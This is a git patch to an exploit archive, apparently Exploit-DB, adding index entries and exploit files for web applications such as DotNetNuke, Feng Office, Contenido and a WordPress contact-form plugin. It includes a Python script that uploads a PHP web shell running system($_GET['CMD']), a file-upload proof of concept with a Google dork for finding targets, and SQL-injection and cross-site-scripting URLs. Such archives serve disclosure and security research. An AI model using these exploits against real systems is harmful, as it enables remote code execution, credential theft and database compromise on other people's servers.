From 2dfafcbe5d108fcb4754bc8e310c15e782ee9f3e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 25 Oct 2014 04:45:12 +0000 Subject: [PATCH] Updated 10_25_2014 --- files.csv | 8 ++++++ platforms/asp/webapps/35045.txt | 9 +++++++ platforms/asp/webapps/35048.txt | 9 +++++++ platforms/asp/webapps/35049.txt | 9 +++++++ platforms/php/webapps/34922.txt | 37 ++++++++++++++++++++++++++++ platforms/php/webapps/35041.py | 43 +++++++++++++++++++++++++++++++++ platforms/php/webapps/35042.txt | 10 ++++++++ platforms/php/webapps/35043.txt | 18 ++++++++++++++ platforms/php/webapps/35044.txt | 11 +++++++++ 9 files changed, 154 insertions(+) create mode 100755 platforms/asp/webapps/35045.txt create mode 100755 platforms/asp/webapps/35048.txt create mode 100755 platforms/asp/webapps/35049.txt create mode 100755 platforms/php/webapps/34922.txt create mode 100755 platforms/php/webapps/35041.py create mode 100755 platforms/php/webapps/35042.txt create mode 100755 platforms/php/webapps/35043.txt create mode 100755 platforms/php/webapps/35044.txt diff --git a/files.csv b/files.csv index d16d5bb9b..e14d3a03a 100755 --- a/files.csv +++ b/files.csv @@ -31447,6 +31447,7 @@ id,file,description,date,author,platform,type,port 34918,platforms/cgi/webapps/34918.txt,"Ultra Electronics 7.2.0.19 and 7.4.0.7 - Multiple Vulnerabilities",2014-10-06,"OSI Security",cgi,webapps,443 34919,platforms/php/webapps/34919.txt,"SkyBlueCanvas 1.1 r237 'admin.php' Directory Traversal Vulnerability",2009-07-16,MaXe,php,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 +34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 34923,platforms/linux/local/34923.c,"Linux Kernel 3.16.1 - Remount FUSE Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0 34925,platforms/php/remote/34925.rb,"Wordpress InfusionSoft Plugin Upload Vulnerability",2014-10-09,metasploit,php,remote,80 @@ -31554,3 +31555,10 @@ id,file,description,date,author,platform,type,port 35038,platforms/ios/webapps/35038.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-22,Vulnerability-Lab,ios,webapps,80 35039,platforms/windows/webapps/35039.rb,"DotNetNuke DNNspot Store 3.0.0 Arbitary File Upload",2014-10-22,"Glafkos Charalambous ",windows,webapps,0 35040,platforms/windows/local/35040.txt,"iBackup 10.0.0.32 - Local Privilege Escalation",2014-10-22,"Glafkos Charalambous ",windows,local,0 +35041,platforms/php/webapps/35041.py,"Feng Office 1.7.4 - Arbitrary File Upload",2014-10-23,"AutoSec Tools",php,webapps,0 +35042,platforms/php/webapps/35042.txt,"Feng Office 1.7.4 - Cross Site Scripting Vulnerabilities",2014-10-23,"AutoSec Tools",php,webapps,0 +35043,platforms/php/webapps/35043.txt,"Contenido CMS 4.8.12 Multiple Cross Site Scripting Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 +35044,platforms/php/webapps/35044.txt,"Alguest 1.1 Multiple Cookie Authentication Bypass Vulnerabilities",2010-12-03,"Aliaksandr Hartsuyeu",php,webapps,0 +35045,platforms/asp/webapps/35045.txt,"DotNetNuke 5.5.1 'InstallWizard.aspx' Cross Site Scripting Vulnerability",2010-12-03,"Richard Brain",asp,webapps,0 +35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 'ArticlesTablelist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0 +35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0 diff --git a/platforms/asp/webapps/35045.txt b/platforms/asp/webapps/35045.txt new file mode 100755 index 000000000..fe9e3d0a5 --- /dev/null +++ b/platforms/asp/webapps/35045.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45180/info + +DotNetNuke is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +DotNetNuke 5.5.1 is vulnerable; prior versions may also be affected. + +http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE= \ No newline at end of file diff --git a/platforms/asp/webapps/35048.txt b/platforms/asp/webapps/35048.txt new file mode 100755 index 000000000..2c34f5f20 --- /dev/null +++ b/platforms/asp/webapps/35048.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45201/info + +Techno Dreams Articles & Papers Package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Techno Dreams Articles & Papers Package 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/papers/ArticlesTablelist.asp?order=[Code] \ No newline at end of file diff --git a/platforms/asp/webapps/35049.txt b/platforms/asp/webapps/35049.txt new file mode 100755 index 000000000..ed1919653 --- /dev/null +++ b/platforms/asp/webapps/35049.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/45202/info + +Techno Dreams FAQ Manager Package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Techno Dreams FAQ Manager Package 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/FAQ/faqlist.asp?order=[Code] \ No newline at end of file diff --git a/platforms/php/webapps/34922.txt b/platforms/php/webapps/34922.txt new file mode 100755 index 000000000..b56bed379 --- /dev/null +++ b/platforms/php/webapps/34922.txt @@ -0,0 +1,37 @@ +========================================================== +"Creative Contact Form - The Best WordPress Contact Form Builder" - +Arbitrary File Upload + +# Author: Gianni Angelozzi +# Date: 08/10/2014 +# Remote: Yes +# Vendor Homepage: https://profiles.wordpress.org/creative-solutions-1/ +# Software Link: https://wordpress.org/plugins/sexy-contact-form/ +# CVE: CVE-2014-7969 +# Version: all including latest 0.9.7 +# Google Dork: inurl:"wp-content/plugins/sexy-contact-form" + +This plugin includes a PHP script to accept file uploads that doesn't +perform any security check, thus allowing unauthenticated remote file +upload, leading to remote code execution. All versions are affected. +Uploaded files are stored with their original file name. +========================================================== +PoC +========================================================== +Trigger a file upload + +
+ +
+Then the file is accessible under + +http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME +========================================================== +EOF + + +Thanks, + +Gianni Angelozzi diff --git a/platforms/php/webapps/35041.py b/platforms/php/webapps/35041.py new file mode 100755 index 000000000..0bff531e0 --- /dev/null +++ b/platforms/php/webapps/35041.py @@ -0,0 +1,43 @@ +import socket + +host = 'localhost' +path = '/feng_community' +shell_path = '/tmp' +port = 80 + +def upload_shell(): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('POST ' + path + '/public/assets/javascript/ckeditor/ck_upload_handler.php HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Proxy-Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 195\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Accept: text/html\r\n' + 'Accept-Encoding: gzip,deflate,sdch\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n' + 'Content-Type: application/octet-stream\r\n' + '\r\n' + '\' + system($_GET[\'CMD\']) + \'\'; ?>\r\n' + '------x--\r\n' + '\r\n') + + resp = s.recv(8192) + + http_ok = 'HTTP/1.1 200 OK' + + if http_ok not in resp[:len(http_ok)]: + print 'error uploading shell' + return + else: print 'shell uploaded to http://' + host + path + shell_path + +upload_shell() \ No newline at end of file diff --git a/platforms/php/webapps/35042.txt b/platforms/php/webapps/35042.txt new file mode 100755 index 000000000..2c0e495c7 --- /dev/null +++ b/platforms/php/webapps/35042.txt @@ -0,0 +1,10 @@ +Source: http://www.securityfocus.com/bid/47049/info + + + +
+" /> + +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/35043.txt b/platforms/php/webapps/35043.txt new file mode 100755 index 000000000..3ddaad862 --- /dev/null +++ b/platforms/php/webapps/35043.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/45160/info + +Contenido CMS is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Contenido CMS 4.8.12 is vulnerable; other versions may also be affected. + +
+ +'> +
+